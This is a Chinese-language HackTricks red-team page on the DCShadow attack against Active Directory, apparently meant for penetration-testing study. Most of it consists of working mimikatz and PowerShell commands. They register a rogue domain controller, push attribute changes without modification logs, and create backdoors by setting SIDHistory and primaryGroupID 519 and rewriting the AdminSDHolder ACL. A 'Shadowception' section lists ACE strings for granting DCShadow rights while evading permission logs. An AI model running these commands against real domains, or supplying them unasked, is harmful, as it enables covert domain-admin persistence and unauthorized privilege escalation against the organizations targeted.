tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
DCShadow
它在 AD 中注册一个 新的域控制器,并使用它在指定对象上 推送属性(SIDHistory, SPNs...) 而不留下任何关于 修改 的 日志。你 需要 DA 权限并且在 根域 内。
请注意,如果使用错误的数据,会出现相当难看的日志。
要执行攻击,你需要 2 个 mimikatz 实例。其中一个将以 SYSTEM 权限启动 RPC 服务器(你必须在这里指明你想要执行的更改),另一个实例将用于推送值:
!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"
lsadump::dcshadow /push
注意 elevate::token
在 mimikatz1
会话中不起作用,因为它提升了线程的权限,但我们需要提升 进程的权限。
您还可以选择并“LDAP”对象:/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local
您可以从 DA 或具有以下最小权限的用户推送更改:
- 在 域对象 中:
- DS-Install-Replica(在域中添加/删除副本)
- DS-Replication-Manage-Topology(管理复制拓扑)
- DS-Replication-Synchronize(复制同步)
- 配置容器 中的 站点对象(及其子对象):
- CreateChild 和 DeleteChild
- 作为 DC 注册的 计算机对象:
- WriteProperty(不是 Write)
- 目标对象:
- WriteProperty(不是 Write)
您可以使用 Set-DCShadowPermissions 将这些权限授予无权限用户(注意这会留下某些日志)。这比拥有 DA 权限要严格得多。
例如:Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose
这意味着用户名 student1 在机器 mcorp-student1 上登录时对对象 root1user 拥有 DCShadow 权限。
使用 DCShadow 创建后门
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>
Shadowception - 使用 DCShadow 授予 DCShadow 权限(无修改权限日志)
我们需要在用户的 SID 末尾附加以下 ACE:
- 在域对象上:
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
- 在攻击者计算机对象上:
(A;;WP;;;UserSID)
- 在目标用户对象上:
(A;;WP;;;UserSID)
- 在配置容器中的站点对象上:
(A;CI;CCDC;;;UserSID)
要获取对象的当前 ACE:(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl
请注意,在这种情况下,您需要进行 多个更改, 而不仅仅是一个。因此,在 mimikatz1 会话(RPC 服务器)中,使用参数 /stack
进行每个更改。 这样,您只需 /push
一次即可在流氓服务器上执行所有堆积的更改。
有关 DCShadow 的更多信息,请访问 ired.team。
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。